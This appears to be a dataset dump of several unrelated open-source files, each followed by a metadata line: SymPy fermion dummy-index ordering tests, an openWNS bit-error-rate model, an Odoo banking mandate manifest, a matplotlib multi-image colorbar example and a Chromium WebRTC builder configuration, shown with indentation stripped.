a, b, c, d, e, f = symbols('a b c d e f', above_fermi=True, cls=Dummy)
p1, p2, p3, p4 = symbols('p1 p2 p3 p4', above_fermi=True, cls=Dummy)
h1, h2, h3, h4 = symbols('h1 h2 h3 h4', below_fermi=True, cls=Dummy)
from sympy.utilities.iterables import variations
v = Function('v')
t = Function('t')
dums = _get_ordered_dummies
# v(abcd)t(abij)t(cdij)
template = v(p1, p2, p3, p4)*t(p1, p2, i, j)*t(p3, p4, i, j)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert dums(base) != dums(expr)
assert substitute_dummies(expr) == substitute_dummies(base)
template = v(p1, p2, p3, p4)*t(p1, p2, j, i)*t(p3, p4, i, j)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert dums(base) != dums(expr)
assert substitute_dummies(expr) == substitute_dummies(base)
def test_equivalent_internal_lines_VT2():
i, j, k, l = symbols('i j k l', below_fermi=True, cls=Dummy)
a, b, c, d = symbols('a b c d', above_fermi=True, cls=Dummy)
v = Function('v')
t = Function('t')
dums = _get_ordered_dummies
exprs = [
# permute v. Same dummy order, not equivalent.
#
        # This test shows that the dummy order may not be sensitive to all
        # index permutations. The following expressions have identical
        # structure to the resulting terms from the dummy substitutions
# in the test above. Here, all expressions have the same dummy
# order, so they cannot be simplified by means of dummy
# substitution. In order to simplify further, it is necessary to
# exploit symmetries in the objects, for instance if t or v is
# antisymmetric.
v(i, j, a, b)*t(a, b, i, j),
v(j, i, a, b)*t(a, b, i, j),
v(i, j, b, a)*t(a, b, i, j),
v(j, i, b, a)*t(a, b, i, j),
]
for permut in exprs[1:]:
assert dums(exprs[0]) == dums(permut)
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [
# permute t.
v(i, j, a, b)*t(a, b, i, j),
v(i, j, a, b)*t(b, a, i, j),
v(i, j, a, b)*t(a, b, j, i),
v(i, j, a, b)*t(b, a, j, i),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [ # permute v and t. Relabelling of dummies should be equivalent.
v(i, j, a, b)*t(a, b, i, j),
v(j, i, a, b)*t(a, b, j, i),
v(i, j, b, a)*t(b, a, i, j),
v(j, i, b, a)*t(b, a, j, i),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_internal_external_VT2T2():
ii, jj = symbols('i j', below_fermi=True)
aa, bb = symbols('a b', above_fermi=True)
k, l = symbols('k l', below_fermi=True, cls=Dummy)
c, d = symbols('c d', above_fermi=True, cls=Dummy)
v = Function('v')
t = Function('t')
dums = _get_ordered_dummies
exprs = [
v(k, l, c, d)*t(aa, c, ii, k)*t(bb, d, jj, l),
v(l, k, c, d)*t(aa, c, ii, l)*t(bb, d, jj, k),
v(k, l, d, c)*t(aa, d, ii, k)*t(bb, c, jj, l),
v(l, k, d, c)*t(aa, d, ii, l)*t(bb, c, jj, k),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
exprs = [
v(k, l, c, d)*t(aa, c, ii, k)*t(d, bb, jj, l),
v(l, k, c, d)*t(aa, c, ii, l)*t(d, bb, jj, k),
v(k, l, d, c)*t(aa, d, ii, k)*t(c, bb, jj, l),
v(l, k, d, c)*t(aa, d, ii, l)*t(c, bb, jj, k),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
exprs = [
v(k, l, c, d)*t(c, aa, ii, k)*t(bb, d, jj, l),
v(l, k, c, d)*t(c, aa, ii, l)*t(bb, d, jj, k),
v(k, l, d, c)*t(d, aa, ii, k)*t(bb, c, jj, l),
v(l, k, d, c)*t(d, aa, ii, l)*t(bb, c, jj, k),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_internal_external_pqrs():
ii, jj = symbols('i j')
aa, bb = symbols('a b')
k, l = symbols('k l', cls=Dummy)
c, d = symbols('c d', cls=Dummy)
v = Function('v')
t = Function('t')
dums = _get_ordered_dummies
exprs = [
v(k, l, c, d)*t(aa, c, ii, k)*t(bb, d, jj, l),
v(l, k, c, d)*t(aa, c, ii, l)*t(bb, d, jj, k),
v(k, l, d, c)*t(aa, d, ii, k)*t(bb, c, jj, l),
v(l, k, d, c)*t(aa, d, ii, l)*t(bb, c, jj, k),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_dummy_order_well_defined():
aa, bb = symbols('a b', above_fermi=True)
k, l, m = symbols('k l m', below_fermi=True, cls=Dummy)
c, d = symbols('c d', above_fermi=True, cls=Dummy)
p, q = symbols('p q', cls=Dummy)
A = Function('A')
B = Function('B')
C = Function('C')
dums = _get_ordered_dummies
# We go through all key components in the order of increasing priority,
# and consider only fully orderable expressions. Non-orderable expressions
# are tested elsewhere.
# pos in first factor determines sort order
assert dums(A(k, l)*B(l, k)) == [k, l]
assert dums(A(l, k)*B(l, k)) == [l, k]
assert dums(A(k, l)*B(k, l)) == [k, l]
assert dums(A(l, k)*B(k, l)) == [l, k]
# factors involving the index
assert dums(A(k, l)*B(l, m)*C(k, m)) == [l, k, m]
assert dums(A(k, l)*B(l, m)*C(m, k)) == [l, k, m]
assert dums(A(l, k)*B(l, m)*C(k, m)) == [l, k, m]
assert dums(A(l, k)*B(l, m)*C(m, k)) == [l, k, m]
assert dums(A(k, l)*B(m, l)*C(k, m)) == [l, k, m]
assert dums(A(k, l)*B(m, l)*C(m, k)) == [l, k, m]
assert dums(A(l, k)*B(m, l)*C(k, m)) == [l, k, m]
assert dums(A(l, k)*B(m, l)*C(m, k)) == [l, k, m]
# same, but with factor order determined by non-dummies
assert dums(A(k, aa, l)*A(l, bb, m)*A(bb, k, m)) == [l, k, m]
assert dums(A(k, aa, l)*A(l, bb, m)*A(bb, m, k)) == [l, k, m]
assert dums(A(k, aa, l)*A(m, bb, l)*A(bb, k, m)) == [l, k, m]
assert dums(A(k, aa, l)*A(m, bb, l)*A(bb, m, k)) == [l, k, m]
assert dums(A(l, aa, k)*A(l, bb, m)*A(bb, k, m)) == [l, k, m]
assert dums(A(l, aa, k)*A(l, bb, m)*A(bb, m, k)) == [l, k, m]
assert dums(A(l, aa, k)*A(m, bb, l)*A(bb, k, m)) == [l, k, m]
assert dums(A(l, aa, k)*A(m, bb, l)*A(bb, m, k)) == [l, k, m]
# index range
assert dums(A(p, c, k)*B(p, c, k)) == [k, c, p]
assert dums(A(p, k, c)*B(p, c, k)) == [k, c, p]
assert dums(A(c, k, p)*B(p, c, k)) == [k, c, p]
assert dums(A(c, p, k)*B(p, c, k)) == [k, c, p]
assert dums(A(k, c, p)*B(p, c, k)) == [k, c, p]
assert dums(A(k, p, c)*B(p, c, k)) == [k, c, p]
assert dums(B(p, c, k)*A(p, c, k)) == [k, c, p]
assert dums(B(p, k, c)*A(p, c, k)) == [k, c, p]
assert dums(B(c, k, p)*A(p, c, k)) == [k, c, p]
assert dums(B(c, p, k)*A(p, c, k)) == [k, c, p]
assert dums(B(k, c, p)*A(p, c, k)) == [k, c, p]
assert dums(B(k, p, c)*A(p, c, k)) == [k, c, p]
def test_dummy_order_ambiguous():
aa, bb = symbols('a b', above_fermi=True)
i, j, k, l, m = symbols('i j k l m', below_fermi=True, cls=Dummy)
a, b, c, d, e = symbols('a b c d e', above_fermi=True, cls=Dummy)
p, q = symbols('p q', cls=Dummy)
p1, p2, p3, p4 = symbols('p1 p2 p3 p4', above_fermi=True, cls=Dummy)
p5, p6, p7, p8 = symbols('p5 p6 p7 p8', above_fermi=True, cls=Dummy)
h1, h2, h3, h4 = symbols('h1 h2 h3 h4', below_fermi=True, cls=Dummy)
h5, h6, h7, h8 = symbols('h5 h6 h7 h8', below_fermi=True, cls=Dummy)
A = Function('A')
B = Function('B')
from sympy.utilities.iterables import variations
# A*A*A*A*B -- ordering of p5 and p4 is used to figure out the rest
template = A(p1, p2)*A(p4, p1)*A(p2, p3)*A(p3, p5)*B(p5, p4)
permutator = variations([a, b, c, d, e], 5)
base = template.subs(zip([p1, p2, p3, p4, p5], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4, p5], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
# A*A*A*A*A -- an arbitrary index is assigned and the rest are figured out
template = A(p1, p2)*A(p4, p1)*A(p2, p3)*A(p3, p5)*A(p5, p4)
permutator = variations([a, b, c, d, e], 5)
base = template.subs(zip([p1, p2, p3, p4, p5], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4, p5], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
# A*A*A -- ordering of p5 and p4 is used to figure out the rest
template = A(p1, p2, p4, p1)*A(p2, p3, p3, p5)*A(p5, p4)
permutator = variations([a, b, c, d, e], 5)
base = template.subs(zip([p1, p2, p3, p4, p5], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4, p5], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
def atv(*args):
return AntiSymmetricTensor('v', args[:2], args[2:] )
def att(*args):
if len(args) == 4:
return AntiSymmetricTensor('t', args[:2], args[2:] )
elif len(args) == 2:
return AntiSymmetricTensor('t', (args[0],), (args[1],))
def test_dummy_order_inner_outer_lines_VT1T1T1_AT():
ii = symbols('i', below_fermi=True)
aa = symbols('a', above_fermi=True)
k, l = symbols('k l', below_fermi=True, cls=Dummy)
c, d = symbols('c d', above_fermi=True, cls=Dummy)
# Coupled-Cluster T1 terms with V*T1*T1*T1
# t^{a}_{k} t^{c}_{i} t^{d}_{l} v^{lk}_{dc}
exprs = [
# permut v and t <=> swapping internal lines, equivalent
# irrespective of symmetries in v
atv(k, l, c, d)*att(c, ii)*att(d, l)*att(aa, k),
atv(l, k, c, d)*att(c, ii)*att(d, k)*att(aa, l),
atv(k, l, d, c)*att(d, ii)*att(c, l)*att(aa, k),
atv(l, k, d, c)*att(d, ii)*att(c, k)*att(aa, l),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_dummy_order_inner_outer_lines_VT1T1T1T1_AT():
ii, jj = symbols('i j', below_fermi=True)
aa, bb = symbols('a b', above_fermi=True)
k, l = symbols('k l', below_fermi=True, cls=Dummy)
c, d = symbols('c d', above_fermi=True, cls=Dummy)
# Coupled-Cluster T2 terms with V*T1*T1*T1*T1
# non-equivalent substitutions (change of sign)
exprs = [
# permut t <=> swapping external lines
atv(k, l, c, d)*att(c, ii)*att(d, jj)*att(aa, k)*att(bb, l),
atv(k, l, c, d)*att(c, jj)*att(d, ii)*att(aa, k)*att(bb, l),
atv(k, l, c, d)*att(c, ii)*att(d, jj)*att(bb, k)*att(aa, l),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == -substitute_dummies(permut)
# equivalent substitutions
exprs = [
atv(k, l, c, d)*att(c, ii)*att(d, jj)*att(aa, k)*att(bb, l),
# permut t <=> swapping external lines
atv(k, l, c, d)*att(c, jj)*att(d, ii)*att(bb, k)*att(aa, l),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_equivalent_internal_lines_VT1T1_AT():
i, j, k, l = symbols('i j k l', below_fermi=True, cls=Dummy)
a, b, c, d = symbols('a b c d', above_fermi=True, cls=Dummy)
exprs = [ # permute v. Different dummy order. Not equivalent.
atv(i, j, a, b)*att(a, i)*att(b, j),
atv(j, i, a, b)*att(a, i)*att(b, j),
atv(i, j, b, a)*att(a, i)*att(b, j),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [ # permute v. Different dummy order. Equivalent
atv(i, j, a, b)*att(a, i)*att(b, j),
atv(j, i, b, a)*att(a, i)*att(b, j),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
exprs = [ # permute t. Same dummy order, not equivalent.
atv(i, j, a, b)*att(a, i)*att(b, j),
atv(i, j, a, b)*att(b, i)*att(a, j),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [ # permute v and t. Different dummy order, equivalent
atv(i, j, a, b)*att(a, i)*att(b, j),
atv(j, i, a, b)*att(a, j)*att(b, i),
atv(i, j, b, a)*att(b, i)*att(a, j),
atv(j, i, b, a)*att(b, j)*att(a, i),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_equivalent_internal_lines_VT2conjT2_AT():
# this diagram requires special handling in TCE
i, j, k, l, m, n = symbols('i j k l m n', below_fermi=True, cls=Dummy)
a, b, c, d, e, f = symbols('a b c d e f', above_fermi=True, cls=Dummy)
p1, p2, p3, p4 = symbols('p1 p2 p3 p4', above_fermi=True, cls=Dummy)
h1, h2, h3, h4 = symbols('h1 h2 h3 h4', below_fermi=True, cls=Dummy)
from sympy.utilities.iterables import variations
# atv(abcd)att(abij)att(ijcd)
template = atv(p1, p2, p3, p4)*att(p1, p2, i, j)*att(i, j, p3, p4)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
template = atv(p1, p2, p3, p4)*att(p1, p2, j, i)*att(j, i, p3, p4)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
# atv(abcd)att(abij)att(jicd)
template = atv(p1, p2, p3, p4)*att(p1, p2, i, j)*att(j, i, p3, p4)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
template = atv(p1, p2, p3, p4)*att(p1, p2, j, i)*att(i, j, p3, p4)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
def test_equivalent_internal_lines_VT2conjT2_ambiguous_order_AT():
    # These diagrams invoke _determine_ambiguous() because the
    # dummies cannot be ordered unambiguously by the key alone
i, j, k, l, m, n = symbols('i j k l m n', below_fermi=True, cls=Dummy)
a, b, c, d, e, f = symbols('a b c d e f', above_fermi=True, cls=Dummy)
p1, p2, p3, p4 = symbols('p1 p2 p3 p4', above_fermi=True, cls=Dummy)
h1, h2, h3, h4 = symbols('h1 h2 h3 h4', below_fermi=True, cls=Dummy)
from sympy.utilities.iterables import variations
# atv(abcd)att(abij)att(cdij)
template = atv(p1, p2, p3, p4)*att(p1, p2, i, j)*att(p3, p4, i, j)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
template = atv(p1, p2, p3, p4)*att(p1, p2, j, i)*att(p3, p4, i, j)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
def test_equivalent_internal_lines_VT2_AT():
i, j, k, l = symbols('i j k l', below_fermi=True, cls=Dummy)
a, b, c, d = symbols('a b c d', above_fermi=True, cls=Dummy)
exprs = [
# permute v. Same dummy order, not equivalent.
atv(i, j, a, b)*att(a, b, i, j),
atv(j, i, a, b)*att(a, b, i, j),
atv(i, j, b, a)*att(a, b, i, j),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [
# permute t.
atv(i, j, a, b)*att(a, b, i, j),
atv(i, j, a, b)*att(b, a, i, j),
atv(i, j, a, b)*att(a, b, j, i),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [ # permute v and t. Relabelling of dummies should be equivalent.
atv(i, j, a, b)*att(a, b, i, j),
atv(j, i, a, b)*att(a, b, j, i),
atv(i, j, b, a)*att(b, a, i, j),
atv(j, i, b, a)*att(b, a, j, i),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_internal_external_VT2T2_AT():
ii, jj = symbols('i j', below_fermi=True)
aa, bb = symbols('a b', above_fermi=True)
k, l = symbols('k l', below_fermi=True, cls=Dummy)
c, d = symbols('c d', above_fermi=True, cls=Dummy)
exprs = [
atv(k, l, c, d)*att(aa, c, ii, k)*att(bb, d, jj, l),
atv(l, k, c, d)*att(aa, c, ii, l)*att(bb, d, jj, k),
atv(k, l, d, c)*att(aa, d, ii, k)*att(bb, c, jj, l),
atv(l, k, d, c)*att(aa, d, ii, l)*att(bb, c, jj, k),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
exprs = [
atv(k, l, c, d)*att(aa, c, ii, k)*att(d, bb, jj, l),
atv(l, k, c, d)*att(aa, c, ii, l)*att(d, bb, jj, k),
atv(k, l, d, c)*att(aa, d, ii, k)*att(c, bb, jj, l),
atv(l, k, d, c)*att(aa, d, ii, l)*att(c, bb, jj, k),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
exprs = [
atv(k, l, c, d)*att(c, aa, ii, k)*att(bb, d, jj, l),
atv(l, k, c, d)*att(c, aa, ii, l)*att(bb, d, jj, k),
atv(k, l, d, c)*att(d, aa, ii, k)*att(bb, c, jj, l),
atv(l, k, d, c)*att(d, aa, ii, l)*att(bb, c, jj, k),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_internal_external_pqrs_AT():
ii, jj = symbols('i j')
aa, bb = symbols('a b')
k, l = symbols('k l', cls=Dummy)
c, d = symbols('c d', cls=Dummy)
exprs = [
atv(k, l, c, d)*att(aa, c, ii, k)*att(bb, d, jj, l),
atv(l, k, c, d)*att(aa, c, ii, l)*att(bb, d, jj, k),
atv(k, l, d, c)*att(aa, d, ii, k)*att(bb, c, jj, l),
atv(l, k, d, c)*att(aa, d, ii, l)*att(bb, c, jj, k),
]
for permut in exprs[1:]:
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_canonical_ordering_AntiSymmetricTensor():
v = symbols("v")
virtual_indices = ('c', 'd')
occupied_indices = ('k', 'l')
c, d = symbols(('c','d'), above_fermi=True,
cls=Dummy)
k, l = symbols(('k','l'), below_fermi=True,
cls=Dummy)
# formerly, the left gave either the left or the right
assert AntiSymmetricTensor(v, (k, l), (d, c)
) == -AntiSymmetricTensor(v, (l, k), (d, c))
| gpl-2.0 | 8,171,116,117,596,623,000 | 36.433657 | 86 | 0.545236 | false |
creasyw/IMTAphy | modules/phy/copper/PyConfig/copper/TimeDependentDistBER.py | 1 | 5027 | ###############################################################################
# This file is part of openWNS (open Wireless Network Simulator)
# _____________________________________________________________________________
#
# Copyright (C) 2004-2009
# Chair of Communication Networks (ComNets)
# Kopernikusstr. 5, D-52074 Aachen, Germany
# phone: ++49-241-80-27910,
# fax: ++49-241-80-22242
# email: [email protected]
# www: http://www.openwns.org
# _____________________________________________________________________________
#
# openWNS is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License version 2 as published by the
# Free Software Foundation;
#
# openWNS is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import openwns.distribution
import openwns.pyconfig
from math import pi
from math import exp
from math import log10
class TimeDependentDistBER(openwns.pyconfig.Sealed):
"""This class is providing a time distributed BER in the form:
BER
| * *
| * *
| * *
| * *
| * *
| * *
| * *
| * *
| * *
| ***
|____________|____________ time
Distance:start middle end
    After giving the start distance, the middle distance and the step, the rest of the curve
    from the middle back to the end is generated automatically.
    The BER is then calculated from the distance between the nodes and is distributed in time
    using wns.Distribution.TimeDependent(time, wns.Distribution.Uniform).
    The curve can be repeated as many times as needed.
"""
B=None
Ps=None
gs= None
gr=None
gamma=None
f= None
c= None
_lambda=None
d0=None
k=None
T=None
def __init__ (self, dataRate, efficiency =1.0, Ps = 0.1, gs = 1, gr = 1, gamma = 2.4, f = 5.5*1E+9, c = 3.0*1E+8, d0 = 1.0, k = 1.38*1E-23, T = 290):
self.B = dataRate/efficiency
self.Ps = Ps
self.gs = gs
self.gr = gr
self.gamma = gamma
self.f = f
self.c = c
self._lambda = c/f
self.d0 = d0
self.k = k
self.T = T
def getDistribution(self, simulationTime, repeatBERCurve, startDistance, middleDistance, step):
dist = openwns.distribution.TimeDependent()
start = startDistance
middle = middleDistance
distanceList = []
step = step
time = 0
last = None
for i in xrange(start, middle, -step):
distanceList.append(i)
last=i
for i in xrange(last, start+step, step):
distanceList.append(i)
deltaT = (simulationTime/repeatBERCurve) / len(distanceList)
for k in xrange(repeatBERCurve):
for j in xrange(len(distanceList)):
dist.eventList.append(openwns.distribution.Event(time, openwns.distribution.Uniform(1.4*self.getBER(distanceList[j]), 0.6*self.getBER(distanceList[j]))))
time = time + deltaT
return dist
def getBER(self, distance):
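        # Link budget based on a log-distance path loss model:
        #   thermal noise   N  = k*T*B, converted to dBm
        #   received power  Pr = Ps*gs*gr * (lambda/(4*pi*d0))**2 * (d0/distance)**gamma
        # The resulting SNR in dB is mapped to a bit error rate via
        # getQ(sqrt(2*SNR)) below.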
Noise=self.k*self.T*self.B
Noise_dbm=10*log10(Noise*1000)
const=self.Ps*self.gs*self.gr*pow((self._lambda/(4*pi*self.d0)),2)
Pr=const*pow((self.d0/distance),self.gamma)
SINR=10*log10(Pr*1000)-Noise_dbm
BER=self.getQ(pow(2*SINR,0.5))
return BER
def getQ(self, x):
        # Large-x approximation of the Gaussian Q-function:
        # Q(x) ~ exp(-x**2 / 2) / (x * sqrt(2*pi))
        Q = (1.0 / (x * pow(2 * pi, 0.5))) * exp(-(pow(x, 2) / 2))
return Q
def findDistanceForThreshold(self, distance, threshold, side):
# side = 1 means bigger than the threshold, side = 0 means smaller than the threshold
if side == 1:
if self.getBER(distance) >= threshold:
return distance
if side == 0:
if self.getBER(distance) < threshold:
return distance
return 0
def findDistanceForThresholdFromList(self, distanceList, threshold, side):
# side = 1 means bigger than the threshold, side = 0 means smaller than the threshold
if side == 1:
for j in xrange(len(distanceList)):
if self.getBER(distanceList[j]) >= threshold:
return distanceList[j]
if side == 0:
for i in xrange(len(distanceList)):
if self.getBER(distanceList[i])<threshold:
return distanceList[i]
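# Illustrative usage sketch, not part of the original openWNS configuration;
# the parameter values below are invented for demonstration only:
#
#     ber = TimeDependentDistBER(dataRate=100E+6)
#     ber.getBER(50)  # BER at a fixed 50 m separation
#     # Uniform distribution around the distance-dependent BER, sweeping
#     # 200 m -> 20 m -> 200 m in 10 m steps, repeated twice over 10 s:
#     dist = ber.getDistribution(10.0, 2, 200, 20, 10)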
| gpl-2.0 | -1,640,753,965,825,216,300 | 36.514925 | 169 | 0.536901 | false |
hbrunn/bank-payment | account_banking_mandate/__openerp__.py | 1 | 1321 | # -*- coding: utf-8 -*-
# © 2014 Compassion CH - Cyril Sester <[email protected]>
# © 2014 Serv. Tecnol. Avanzados - Pedro M. Baeza
# © 2015 Akretion - Alexis de Lattre <[email protected]>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
{
'name': 'Account Banking Mandate',
'summary': 'Banking mandates',
'version': '8.0.0.2.0',
'license': 'AGPL-3',
'author': "Compassion CH, "
"Serv. Tecnol. Avanzados - Pedro M. Baeza, "
"Akretion, "
"Odoo Community Association (OCA)",
'website': 'https://github.com/OCA/bank-payment',
'category': 'Banking addons',
'depends': [
'account_banking_payment_export',
],
'data': [
'views/account_banking_mandate_view.xml',
'views/account_invoice_view.xml',
'views/account_payment_view.xml',
'views/res_partner_bank_view.xml',
'views/bank_payment_line_view.xml',
'data/mandate_reference_sequence.xml',
'data/report_paperformat.xml',
'security/mandate_security.xml',
'security/ir.model.access.csv',
'reports/account_banking_mandate_view.xml',
'reports/account_banking_mandate.xml',
],
'demo': [],
'test': ['test/banking_mandate.yml'],
'installable': True,
}
| agpl-3.0 | -7,318,439,020,409,000,000 | 34.621622 | 68 | 0.600152 | false |
sniemi/SamPy | sandbox/src1/examples/multi_image.py | 1 | 1769 | #!/usr/bin/env python
'''
Make a set of images with a single colormap, norm, and colorbar.
It also illustrates colorbar tick labelling with a multiplier.
'''
from matplotlib.pyplot import figure, show, sci
from matplotlib import cm, colors
from matplotlib.font_manager import FontProperties
from numpy import amin, amax, ravel
from numpy.random import rand
Nr = 3
Nc = 2
fig = figure()
cmap = cm.cool
figtitle = 'Multiple images'
t = fig.text(0.5, 0.95, figtitle,
horizontalalignment='center',
fontproperties=FontProperties(size=16))
cax = fig.add_axes([0.2, 0.08, 0.6, 0.04])
w = 0.4
h = 0.22
ax = []
images = []
vmin = 1e40
vmax = -1e40
for i in range(Nr):
for j in range(Nc):
pos = [0.075 + j*1.1*w, 0.18 + i*1.2*h, w, h]
a = fig.add_axes(pos)
if i > 0:
a.set_xticklabels([])
# Make some fake data with a range that varies
# somewhat from one plot to the next.
data =((1+i+j)/10.0)*rand(10,20)*1e-6
dd = ravel(data)
# Manually find the min and max of all colors for
# use in setting the color scale.
vmin = min(vmin, amin(dd))
vmax = max(vmax, amax(dd))
images.append(a.imshow(data, cmap=cmap))
ax.append(a)
# Set the first image as the master, with all the others
# observing it for changes in cmap or norm.
norm = colors.Normalize(vmin=vmin, vmax=vmax)
for i, im in enumerate(images):
im.set_norm(norm)
if i > 0:
images[0].add_observer(im)
# The colorbar is also based on this master image.
fig.colorbar(images[0], cax, orientation='horizontal')
# We need the following only if we want to run this
# script interactively and be able to change the colormap.
sci(images[0])
show()
| bsd-2-clause | 9,214,454,940,438,378,000 | 23.232877 | 64 | 0.637648 | false |
eunchong/build | scripts/slave/recipe_modules/chromium_tests/chromium_webrtc_fyi.py | 1 | 3616 | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
import collections
from . import chromium_linux
from . import chromium_mac
from . import chromium_win
from . import chromium_webrtc
# GN builders are added first. They're set up to be as similar as possible to
# the builders in Chromium, to be able to detect breakages pre-roll.
SPEC = {
'settings': {
'build_gs_bucket': 'chromium-webrtc',
},
'builders': {},
}
def AddGNBuilder(spec, name):
SPEC['builders'][name] = copy.deepcopy(spec['builders'][name])
AddGNBuilder(chromium_linux.SPEC, 'Android GN')
AddGNBuilder(chromium_linux.SPEC, 'Android GN (dbg)')
AddGNBuilder(chromium_mac.SPEC, 'Mac GN')
AddGNBuilder(chromium_mac.SPEC, 'Mac GN (dbg)')
AddGNBuilder(chromium_win.SPEC, 'Win x64 GN')
AddGNBuilder(chromium_win.SPEC, 'Win x64 GN (dbg)')
for b in SPEC['builders'].itervalues():
b.setdefault('gclient_apply_config', [])
b['gclient_apply_config'].append('chromium_webrtc_tot')
b['tests'] = [] # These WebRTC builders only run compile.
# Remaining builders are WebRTC-specific builders that compile and run tests
# that are focused on testing WebRTC functionality. Some of these tests are
# marked MANUAL since they require audio and/or video devices on the machine
# they run on.
_builders = collections.defaultdict(dict)
def AddBuildSpec(name, platform, target_bits=64, build_config='Release'):
SPEC['builders'][name] = chromium_webrtc.BuildSpec(
platform, target_bits, build_config=build_config,
gclient_config='chromium_webrtc_tot')
assert target_bits not in _builders[platform]
_builders[platform][target_bits] = name
def AddTestSpec(name, perf_id, platform, target_bits=64,
build_config='Release'):
parent_builder = _builders[platform][target_bits]
SPEC['builders'][name] = chromium_webrtc.TestSpec(
parent_builder,
perf_id,
platform,
target_bits,
build_config,
gclient_config='chromium_webrtc_tot',
test_spec_file='chromium.webrtc.fyi.json')
AddBuildSpec('Win Builder', 'win', target_bits=32)
AddBuildSpec('Mac Builder', 'mac')
AddBuildSpec('Linux Builder', 'linux')
AddBuildSpec('Android Builder (dbg)', 'android', target_bits=32,
build_config='Debug')
AddBuildSpec('Android Builder ARM64 (dbg)', 'android', build_config='Debug')
AddTestSpec('Win7 Tester', 'chromium-webrtc-trunk-tot-rel-win7', 'win',
target_bits=32)
AddTestSpec('Win10 Tester', 'chromium-webrtc-trunk-tot-rel-win10', 'win',
target_bits=32)
AddTestSpec('Mac Tester', 'chromium-webrtc-trunk-tot-rel-mac', 'mac')
AddTestSpec('Linux Tester', 'chromium-webrtc-trunk-tot-rel-linux', 'linux')
AddTestSpec('Android Tests (dbg) (K Nexus5)',
'chromium-webrtc-trunk-tot-dbg-android-nexus5-k', 'android',
target_bits=32, build_config='Debug')
AddTestSpec('Android Tests (dbg) (L Nexus5)',
'chromium-webrtc-trunk-tot-dbg-android-nexus5', 'android',
target_bits=32, build_config='Debug')
